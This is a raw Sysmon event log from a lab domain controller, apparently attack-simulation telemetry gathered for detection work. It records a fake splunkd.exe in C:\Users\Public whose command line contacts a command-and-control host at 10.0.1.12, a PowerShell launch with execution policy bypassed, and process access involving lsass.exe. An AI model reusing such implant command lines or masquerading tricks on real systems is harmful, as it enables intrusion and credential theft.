10:40:10.666{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E0A-5F80-3900-000000007F01}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000001642Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.635{733EE690-3E0A-5F80-3900-000000007F01}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_sacnmrx0.nvn.ps12020-10-09 10:40:10.635 10341000x80000000000000001641Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.611{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E0A-5F80-3900-000000007F01}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001640Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.599{733EE690-3E01-5F80-2600-000000007F01}30602156C:\Windows\system32\conhost.exe{733EE690-3E0A-5F80-3900-000000007F01}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001639Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.599{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001638Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.598{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001637Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.598{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001636Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.598{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001635Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.598{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.598{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001633Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.598{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001632Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.598{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001631Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.598{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001630Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.598{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-3900-000000007F01}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001629Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.597{733EE690-3E01-5F80-2500-000000007F01}3052484C:\Users\Public\splunkd.exe{733EE690-3E0A-5F80-3900-000000007F01}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Users\Public\splunkd.exe+5c36e 154100x80000000000000001628Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.597{733EE690-3E0A-5F80-3900-000000007F01}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C zdecdiC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3E01-5F80-2500-000000007F01}3052C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 10341000x80000000000000001627Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.526{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001626Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.526{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001625Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.526{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001624Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.526{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001623Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.526{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001622Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.526{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001621Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.526{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001620Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.526{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001619Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.526{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001618Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.432{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001617Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.432{733EE690-3DF7-5F80-0A00-000000007F01}8521292C:\Windows\system32\services.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001616Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.945{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001615Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 